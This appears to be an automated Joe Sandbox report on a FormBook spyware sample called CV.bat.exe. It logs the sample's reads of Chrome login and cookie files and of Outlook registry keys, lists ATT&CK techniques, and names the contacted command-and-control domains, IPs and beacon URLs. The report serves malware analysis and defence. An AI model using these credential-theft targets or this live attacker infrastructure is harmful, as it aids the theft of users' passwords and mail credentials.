Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation

Source: C:\Users\user\Desktop\CV.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\chkdsk.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	612 Process Injection	1 Masquerading	1 OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	612 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	114 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Software Packing	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
CV.bat.exe	33%	ReversingLabs	ByteCode-MSIL.Spyware.Noon
CV.bat.exe	35%	Virustotal		Browse
CV.bat.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe	33%	ReversingLabs	ByteCode-MSIL.Spyware.Noon

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
8.0.CV.bat.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.yaignars.site/redb/?SrNH_=ZbLl4nlXWVx&WvMH=sSqPgCldjkbi0+fTeRrTo1yeRkXijBFS3eCOWeLwWqlRfT02SfRof0res+4jmsjJUPdu+dXwzSVFQdySZWLfkZF8oXotr+qwUQ==	0%	Avira URL Cloud	safe
www.miarizzuto.org/redb/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
www.miarizzuto.org/redb/	1%	Virustotal		Browse
http://www.fontbureau.comgrito	0%	URL Reputation	safe
http://www.yaignars.site/redb/	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.miarizzuto.org/redb/?SrNH_=ZbLl4nlXWVx&WvMH=ClEE/ZchhSWI9Fw4wt/3uVHiPVKnhBdsoB1lL7XTwBZGLskW0dT3J+GyfBiSRlOqjq3/13+wQlUMF9TRa7Zw+CqEhvu+ka1r7A==	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://survey-smiles.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.yaignars.site	91.195.240.94	true	true	unknown
www.miarizzuto.org	63.141.242.46	true	true	unknown
www.hipnoterapia.store	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.miarizzuto.org/redb/	true	1%, Virustotal, Browse Avira URL Cloud: safe	low
http://www.yaignars.site/redb/?SrNH_=ZbLl4nlXWVx&WvMH=sSqPgCldjkbi0+fTeRrTo1yeRkXijBFS3eCOWeLwWqlRfT02SfRof0res+4jmsjJUPdu+dXwzSVFQdySZWLfkZF8oXotr+qwUQ==	true	Avira URL Cloud: safe	unknown
http://www.yaignars.site/redb/	true	Avira URL Cloud: safe	unknown
http://www.miarizzuto.org/redb/?SrNH_=ZbLl4nlXWVx&WvMH=ClEE/ZchhSWI9Fw4wt/3uVHiPVKnhBdsoB1lL7XTwBZGLskW0dT3J+GyfBiSRlOqjq3/13+wQlUMF9TRa7Zw+CqEhvu+ka1r7A==	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	chkdsk.exe, 00000011.00000002.529818531.000000000547C000.00000004.00000020.00020000.00000000.sdmp, f-0386u9.17.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000000.00000002.302134745.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	f-0386u9.17.dr	false		high
http://www.fontbureau.com/designers/?	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	chkdsk.exe, 00000011.00000002.529818531.000000000547C000.00000004.00000020.00020000.00000000.sdmp, f-0386u9.17.dr	false		high
http://www.fontbureau.com/designers?	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://img.sedoparking.com	chkdsk.exe, 00000011.00000002.534772213.000000000622A000.00000004.10000000.00040000.00000000.sdmp	false		high
https://search.yahoo.com?fr=crmas_sfpf	f-0386u9.17.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	f-0386u9.17.dr	false		high
http://www.tiro.com	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	chkdsk.exe, 00000011.00000002.529818531.000000000547C000.00000004.00000020.00020000.00000000.sdmp, f-0386u9.17.dr	false		high
http://www.fontbureau.com/designers	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	chkdsk.exe, 00000011.00000002.529818531.000000000547C000.00000004.00000020.00020000.00000000.sdmp, f-0386u9.17.dr	false		high
http://www.carterandcone.coml	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.sedo.com/services/parking.php3	chkdsk.exe, 00000011.00000002.534772213.000000000622A000.00000004.10000000.00040000.00000000.sdmp	false		high
http://www.typography.netD	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	f-0386u9.17.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	f-0386u9.17.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comgrito	CV.bat.exe, 00000000.00000002.302134745.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	f-0386u9.17.dr	false		high
http://survey-smiles.com	chkdsk.exe, 00000011.00000002.534712310.0000000005F06000.00000004.10000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.name.com/domain/renew/yaignars.site?utm_source=Sedo_parked_page&utm_medium=button&utm_ca	chkdsk.exe, 00000011.00000002.534772213.000000000622A000.00000004.10000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.195.240.94	www.yaignars.site	Germany		47846	SEDO-ASDE	true
63.141.242.46	www.miarizzuto.org	United States		33387	NOCIXUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	715070
Start date and time:	2022-10-03 15:54:25 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 40s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	CV.bat.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/8@6/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 42.3% (good quality ratio 36.6%) Quality average: 71.3% Quality standard deviation: 33.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:55:33	API Interceptor	1x Sleep call for process: CV.bat.exe modified
15:55:39	API Interceptor	30x Sleep call for process: powershell.exe modified

Process:	C:\Users\user\Desktop\CV.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1308
Entropy (8bit):	5.345811588615766
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
MD5:	2E016B886BDB8389D2DD0867BE55F87B
SHA1:	25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
SHA-256:	1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
SHA-512:	C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	21916
Entropy (8bit):	5.598554637748755
Encrypted:	false
SSDEEP:	384:QtCRqC0IGTFippmG0hqIMp3e1SjnYu9HiJ9gRSJ3uyVI+m0K1AVrd4ReA+i3Yb:uTa8GyqINoYu93Rcuejdb
MD5:	05AE9D4391F6991A22DE76228304DC86
SHA1:	7E4D3D57B5995B872C1ABF87485E1D8B831C309E
SHA-256:	331B0FC203A9554E0F928C4313324CE1844BABB44E9D948CE8E287811DC7C7DC
SHA-512:	E4D40B90FDB2CD541745261254FD77D0626CC2BECE1E78A63D4EC6D9AED9B30F3475C28CA2A8B55FCBAFA19715D82DBD104D865DFBB030DC4C5B9C661E9C02DD
Malicious:	false
Preview:	@...e...........................j...8.!..............@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

